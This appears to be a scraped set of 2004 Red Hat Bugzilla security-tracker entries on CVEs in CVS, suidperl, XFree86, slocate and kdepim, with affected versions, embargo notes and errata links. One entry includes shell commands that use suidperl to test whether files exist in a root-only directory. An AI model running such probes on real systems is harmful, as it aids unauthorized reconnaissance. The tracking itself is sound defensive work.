http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0081.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0977
Discussion:
A rebuild from cvs-1.11.11-1 (or higher) from Fedora Development
at Fedora Core 1 solves the problem, so maybe one of the Red Hat
maintainers could do that? Would be very nice :)
BTW: Maybe the kerberos 4 support has to be disabled.
---
Maybe that issue is fixed soon by one of
Bugzilla
CVE-2003-0618 leaks file existence information
bugzilla·2004-02-04·CVSS 2.1
CVE-2003-0618 [LOW] CVE-2003-0618 leaks file existence information
CAN-2003-0618 was reported 2003Jul29 to Debian. You can test for the
existence of files even if you don't have permission to do so by using
the suidperl command.
$ su
# mkdir ~root/delme; chmod 700 ~root/delme;touch ~root/delme/1
# exit
$ suidperl ~root/delme/1
Script is not setuid/setgid in suidperl
$ suidperl ~root/delme/2
Can't open perl script "/root/delme/2": No such file ...
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=220486
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=203426
Affects: 2.1AS 2.1ES 2.1AW 2.1WS (5.6.1)
Affects: 3AS 3ES 3WS (5.8.0)
Debian released an errata for this issue in Feb 2004.
Discussion:
Actually this doesn't affect RHEL3 because the setuid perl package was
not shipped.
---
I did some verification
Bugzilla
CAN-2004-0083 XFree86 font.alias overflow
bugzilla·2004-02-04
[MEDIUM] CAN-2004-0083 XFree86 font.alias overflow
Reported to Red Hat by XFree86 on 2004Feb03 via iDefense.
A malicious user may craft a malformed 'font.alias' file causing a
buffer overflow upon parsing, which could lead to execution of
arbitrary code as root on the server.
Embargoed. No date for public notification set; CVE applied for.
Patch available. Last update was RHSA-2003:289. Will be backported
to 4.1.0. Errata in progress.
Discussion:
CAN-2004-0083, embargo lifts on Feb11
---
Subsequently, iDefense found another issue in the same routine with
the same consequences which has been given CVE name CAN-2004-0083.
Additionally David Dawes discovered additional flaws in reading font
files. The Common Vulnerabilities and Exposures project
(cve.mitre.org) has assigned the name CAN-2004-
Bugzilla
CAN-2003-0848 slocate buffer overflow
bugzilla·2004-01-21
[MEDIUM] CAN-2003-0848 slocate buffer overflow
A heap-based buffer overflow in slocate can allow local users to gain
"slocate" privileges via a modified slocate database that causes a
negative "pathlen" value.
Discussion:
Um, I think you have the wrong CVE name; it is CAN-2003-0848... :-)
---
An errata has been issued which should help the problem described in this bug report.
This report is therefore being closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files, please follow the link below. You may reopen
this bug report if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2004-040.html
Bugzilla
CAN-2003-0988 kdepim VCF parsing vulnerability
bugzilla·2004-01-07
[MEDIUM] CAN-2003-0988 kdepim VCF parsing vulnerability
The KDE team found a buffer overflow in the file information reader of
VCF files. An attacker could construct a VCF file so that when it was
opened by a victim it would execute arbitrary commands. The Common
Vulnerabilities and Exposures project (cve.mitre.org) has assigned the
name CAN-2003-0988 to this issue.
CAN-2003-0988 Affects: 3AS 3ES 3WS
Note the kdepim packages in RHEL 2.1 are not affected by this issue.
RHSA-2004:005 will provide updated packages with a backported security
patch.
This issue is under embargo and will be opened on January 14th 2004.
Discussion:
Fixed, see http://rhn.redhat.com/errata/RHSA-2004-005.html
References:
http://marc.info/?l=bugtraq&m=108386181021070&w=2
http://secunia.com/advisories/11569
http://www.osvdb.org/5945
http://www.securityfocus.com/bid/10295
https://exchange.xforce.ibmcloud.com/vulnerabilities/16078
Published: 2004-05-06